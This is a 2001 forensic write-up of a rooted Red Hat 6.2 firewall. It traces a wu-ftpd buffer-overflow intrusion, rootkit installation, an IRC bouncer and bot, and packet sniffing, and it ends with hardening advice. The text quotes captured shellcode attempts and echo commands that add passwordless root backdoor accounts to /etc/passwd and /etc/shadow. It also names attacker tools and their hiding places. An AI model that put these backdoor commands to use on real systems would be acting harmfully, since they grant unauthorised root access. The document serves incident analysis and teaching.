Curt Wilson, Netw3 Consulting 02/02/2001
This is my first analysis of a Linux
box that has been
rooted. This is intended to be somewhat
of a teaching
document, and does not assume a large
degree of
technical skill. If anyone sees any
errors in here or
has any comments, I'd be happy to
hear from you at
netw3@netw3.com
The box in question is an unpatched
Red Hat Linux
6.2 machine running as an ipchains
firewall and IP
masquerade server.
The attacker(s) main goal in system
compromise
seems to be for the purpose of setting
up a BNC
server that will allow connections
to IRC networks
and an IRC bot. Attacker also used
the compromised
linux system to search for other vulnerable
systems
running the Washington University
FTP through the
use of two exploits (wu-scan and muje)
as well as
the attempted or actual exploits of
numerous remote
systems through the statdx exploit.
The statd exploit
attacks the remote procedure call
application
rpc.statd and opens up an interactive
root shell on
TCP port 39168. (For more info on
statdx, see paper
by George Bakos at
http://www.sans.org/y2k/practical/George_Bakos.html
.)
Intruder erased log directory /var/log
which damaged
numerous symlinks. A more careful
attacker would
have left this directory intact but
edited the specific
log files to erase their tracks. It
is clear from system
analysis that this person is what’s
known as a “script
kiddie” and does not represent an
advanced attacker.
Intruder appears to have penetrated
the system using
an exploit that attacks WU-FTP. The
default wu-ftp on
Red Hat 6.2 (wu-2.6.0(1) in this case)
is vulnerable
and exploit code has been published
on the Internet
and has been in wide use amongst the
cracker
underground. Patches are available
on the redhat
website.
Buffer overflow attacks on wu-ftp take
place through
a specially crafted password sequence
that includes
the spawning of /bin/sh. The IP addresses
are most
likely other compromised systems that
the attackers
are using to break into other sites
and could be one of
the sites that was used to crack this
box. Logs of
attacks in progress:
211.72.123.250 => external_ip_of_linux_system
[21]
LeLmNnNnUSER ftp
NBnPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
151.15.186.199 => external_ip_of_linux_system
[21]
Xv+R6-6-
user ftp]-1pass 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a-
3-a-aSITE EXEC %x %x %x %x +%x |%x
156.111.178.186 => external_ip_of_linux_system
[21]
EEUSER ftp
QPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
syr-24-95-165-70.twcny.rr.com =>
external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
211.250.5.4 => external_ip_of_linux_system
[21]
FFUSER ftp
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
63.105.115.4 => external_ip_of_linux_system
[21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
The wu-ftp exploit probably allowed
the attacker to
bind /bin/sh with a TCP port. The
attacker then
telnets to the port and has interactive
root access.
Another method is that the exploit
allows the
execution of arbitrary code such as
appending a
username into the /etc/passwd and
/etc/shadow files
that is then used through the telnet
port. Without
detailed logs, it’s hard to know exactly
what the
attacker did since they cleaned up
some other
commonly exploited services when they
first logged
in to the system. It’s possible that
the attacker gained
some other means of initial access
but evidence
suggests that these FTP exploits were
the means. A
Red Hat announcement about this problem
can be
found at http://www.redhat.com/support/errata/RHSA-
2000-039.html
At some point, this attacker (or other
attackers)
placed a file in /bin/psr which adds
a user
named “rewt” with root level access
and a user
named “mujixi” to the /etc/passwd
and /etc/shadow
files:
echo "rewt:x:0:0:root user,,,:/root:/bin/bash"
>>/etc/passwd
echo "mujixi:x:666:666:ala care da
muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow
After obtaining root access, attacker
modified multiple
system files and scripts to cover
their tracks:
/etc/rc.d/rc.sysinit has been modified
to run the
following:
/usr/sbin/sshd2
/usr/sbin/gpm.root
/usr/sbin/gpm.root
/usr/sbin/gpm.root appears to be controlled
by a
config file /etc/gpm-root.conf and
contains the
following commands:
cd /usr/X11R6/include/X11/…
This directory is invisible to the
standard ls
command, but will show up with an
ls –a to display
all files. This is a common attacker
trick. Most of
attackers tools were placed in this
directory.
./linsniffer > tcp.log &
linsniffer captures login and passwords
in an
Ethernet environment. A switched network
makes
this attack more
difficult
/usr/sbin/sshd2 –p 1983
Attacker runs an SSH server on port 1983.
After exploiting the system for root
access, the
attacker appeared to add a username
“muje1” to
the /etc/passwd and/or /etc/shadow
files with a group
ID of 501. Attacker also edited the
/etc/ftpusers file,
perhaps allowing more users to login
through FTP
than the original setting. Other suspicious
user id’s
include “muje” and group ID’s include
1018 and 1004.
Next, attacker kills all instances
of the lpd process.
This is probably so others won’t exploit
“his” system
through an lpd buffer overflow (never
mind that lpd
was not an open port from the outside,
attacker
wanted to secure his own access).
Attacker also
removed the portmapper startup file
in /etc/rc.d/init.d/portmap which
stopped the
portmapper from listening on TCP port
111 (never
mind that portmapper was not an open
port from the
outside). Attacker then cleans up
by
running “updatedb” and removing a
package named
srk.tar.gz (which might be a rootkit),
and removing
the home directories of users muje
and muje1.
The user appears to have replaced various
system
binaries such as netstat, ps, ifconfig,
and top to cover
their tracks. The replaced version
of ps does not
show activity such as the linsniffer,
and the replaced
version of ifconfig does now show
the interface
running in promiscuous mode. The other
replaced
binaries are most likely tailored
to hide the attackers
activities from administrators eyes.
These
replacements may have been done with
srk.tar.gz. I
was unable to find a published tool
named “srk” but
the “rk” suggests a rootkit. Please
see
http://packetstorm.securify.com/UNIX/penetration/root
kits/ for a large selection of rootkits.
The group ID 1018 appears to have ran
the rootkit.
The system binaries that were replaced
by this
activity are as follows:
-rwxr-xr-x 1 1018 users 19840 Nov 25
1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec
27
1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan
2
1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan
12
1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec
19
10:14 /bin/vobiscu (unfamiliar)
The group ID 1004 created the following
files of
interest:
[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13
21:01 /dev/caca
[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666
31337 is commonly used in the computer
underground. Many Trojan horse applications
listen
on port 31337. It is a variation of
the word “elite”. 666
is used by attackers, and port 6666
may refer to an
IRC or BNC server.
-rw-rw-r-- 1 root 501 97 Jan 13
21:01 /dev/dsx
[root@fortran /netw3]# strings /dev/dsx
| more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
/dev/dsx appears to be a listing of
what the attacker
has installed.
-rw-rw-r-- 1 root 501 12288 Jan 13
21:01 /etc/psdevtab
[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root 501 4096 Jan 24
00:17 .
drwxr-x--- 8 root root 4096 Feb 2
18:54 ..
-rw------- 1 root root 663 Jan 28
20:41
known_hosts
-rw------- 1 root 501 512 Jan 28 20:41
random_seed
-rw-r--r-- 1 1004 users 307 Aug 31
1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13
21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13
21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb 3
04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27
1998 /usr/man/man6/sshd_config
/usr/man/man6 is also used by attacker(s)
to store
SSH key and configuration files.
The following ports are open and listening
on the local
(192.168) interface of the system:
21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker
The primary user that ran the BNC server
appears to
go by the name of “bulangia” or “buLaneL”
or “bulanel” and a secondary user
goes by the name
of “NINA16”. There is evidence of
multiple
connections to Bulgaria and Italian
IRC networks and
remote systems. Some of the hosts
that used the
BNC server include 5dial86.xnet.ro
and
11dial217.xnet.ro. Various IRC servers
were visited
by these users, and if further action
was warranted,
investigations could take place by
connecting to the
same IRC networks and attempting to
track these
people down.
Attacker(s) also installed what appears
to be an IRC
bot going by the name of “eddy” or
“eddybot”. The
software package used to implement
this bot was
called emech-2.8 and the config file
for e-mech
reveals details such as an ircname
of “H-a-c-k T-h-e
F-u-c-k-i-n-g P-l-a-n-e-t !” and channels
such
as “#Linux_mafia”. The linkpass and
entityname are
present in the config and users file,
which could allow
counterintelligence to be performed
if desired.
Recommendations:
Apply patches to Red Hat systems running
ipchains
firewalls. Red Hat 6.2 has nearly
50 security patches.
See http://www.redhat.com/support/errata/rh62-
errata-security.html.
Several accounts and passwords were
obtained
through the user of the linsniffer
application. A
switched environment can help reduce
the risk of
sniffing attacks.
Lock down systems to provide “defense
in depth”. Do
not simply rely upon ipchains to block
hostile traffic.
Deny all traffic except what is specifically
allowed.
Comment out services in /etc/services
that do not
need to be ran (finger, etc) as well
as in /etc/rc.d. If
the FTP service will be used, make
sure
that /etc/ftpusers only allows specific
usernames. If
attacker pierces firewall mechanism,
limit what is
available by turning off everything
that is not needed,
leaving only those services that are
truly necessary.
Portsentry, which is running on the
system, is a nice
addition, but obviously did not help
in this instance.
Since the wu-ftp vulnerabilities are
widely known,
attacker would only have to find the
existence of TCP
port 21 with a banner that identified
itself as a
vulnerable version of wu-ftp. The
use of TCP
wrappers and ipchains to restrict
access to ftpd
would be helpful. Modify listening
services banners to
reflect false information to confuse
attackers and
automated exploit/scanning applications.
Systems management should never be
performed
over an unencrypted connection such
as telnet.
Install SSH on the server and on your
client systems
and use it. This encrypts connections
and makes it
much harder for an attacker to obtain
your login
credentials.
An intrusion detection system such
as snort
(www.snort.org) is inexpensive, easy
to configure,
and in wide use. Snort can monitor
a network and
alert a network manager (with the
proper
configuration) via pager or email
that an attack is
taking place. Tripwire is a file integrity
monitor that
can be used to take a snapshot of
certain key system
files ( such as ps, netstat, ifconfig,
and many more).
When these key system files are changed,
an alert
can be generated to notify that something
suspicious
is taking place. There are freeware/GPL
options for
SSH (openSSH) and a freeware tripwire
clone
available on the Internet (see www.whitehats.com
for
a large collection of open source
security tools).
Curt Wilson - Netw3 Consulting
netw3@netw3.com